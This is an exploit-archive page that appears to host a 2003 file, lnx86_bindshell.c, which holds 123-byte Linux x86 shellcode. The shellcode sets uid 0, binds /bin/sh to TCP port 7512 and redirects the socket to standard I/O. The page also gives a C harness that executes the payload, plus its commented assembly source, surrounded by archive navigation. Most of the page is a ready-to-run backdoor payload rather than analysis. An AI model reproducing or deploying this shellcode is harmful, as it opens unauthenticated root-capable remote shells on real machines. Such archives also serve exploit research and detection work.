lnx86_bindshell.c

lnx86_bindshell.c: Posted Oct 14, 2003; Authored by posidron | Site tripbit.org; Linux x86 shellcode that binds a shell to port 7512 and has a size of 123 bytes.; tags | shell, x86, shellcode; systems | linux; SHA-256 | 446f8b26d46953947345898cf7cb71847960df0cffc32e68b8a82a2a3d321273; Download | Favorite | View

lnx86_bindshell.c

/*  Tripbit Security Research (tripbit.org)
 *
 *        title: lnx86_bindshell
 *         port: 7512
 *         size: 123 bytes
 *       system: linux x86
 *       author: posidron
 *      contact: posidron[at]tripbit.org
 */

#include <stdio.h>

char bindshell[]= "\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x6a\x01\x6a"
      "\x02\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x31\xd2\x52"
      "\x66\x68\x1d\x58\x66\x6a\x02\x89\xe2\x31\xc9\x6a"
      "\x10\x52\x50\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x6a"
      "\x02\x6a\x03\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31"
      "\xc9\x51\x51\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd"
      "\x80\x31\xc9\x89\xc3\xb0\x3f\xcd\x80\xfe\xc1\xb0"
      "\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31\xc0\x50"
      "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
      "\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xdb"
      "\xb0\x01\xcd\x80";

int main(int argc, char **argv)
{
  void(*tsr) (void);
        tsr = (void*)bindshell;
        tsr();
  return 0;
}


/*
%eax   Name      %ebx      %ecx            
1  sys_exit    int      -
11  sys_execve    struct pt_regs    -
23  sys_setuid    uid_t      -
63  sys_dup2    unsigned int    unsigned int
102  sys_socketcall    int      unsigned long*

- sys_socketcall_socket  = 1
- sys_socketcall_bind  = 2
- sys_socketcall_listen  = 4
- sys_socketcall_accept  = 5
*/


/*
main()
{
  __asm__("
    xor %ebx, %ebx
    movb $0x17, %al
    int $0x80

    xor %eax, %eax
    push %eax
    push $0x1
    push $0x2
    mov %esp,%ecx
    incb %bl
    movb $0x66,%al
    int $0x80

    xor %edx, %edx
    push %edx
    pushw $0x581d
    pushw %0x2
    mov %esp, %edx
    xor %ecx, %ecx
    push $0x10
    push %edx
    push %eax
    mov %esp, %ecx
    incb %bl
    mov $0x66, %al
    int $0x80

    push $0x2
    push $0x3
    mov %esp, %ecx
    movb $0x4, %bl
    movb $0x66, %al
    int $0x80

    xor %ecx, %ecx
    push %ecx
    push %ecx
    push $0x3
    mov %esp, %ecx
    incb %bl
    movb $0x66, %al
    int $0x80

    mov %ecx, %ecx
    mov %eax, %ebx
    movb $0x3f, %al
    int $0x80
    incb %cl
    mov $0x3f, %al
    int $0x80
    incb %cl
    movb $0x3f, %al
    int $0x80

    xor %eax, %eax
    push %eax
    push $0x68732f2f
    push $0x6e69622f
    mov %esp, %ebx
    push %eax 
    push %ebx
    mov %esp, %ecx
    xor %edx, %edx
    movb $0xb, %al
    int $0x80
    
    xor %ebx, %ebx
    movb $0x1, %al
    int $0x80
  ");
}
*/

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 66 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
gabe_k 3 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

lnx86_bindshell.c

lnx86_bindshell.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

lnx86_bindshell.c

Share This

lnx86_bindshell.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems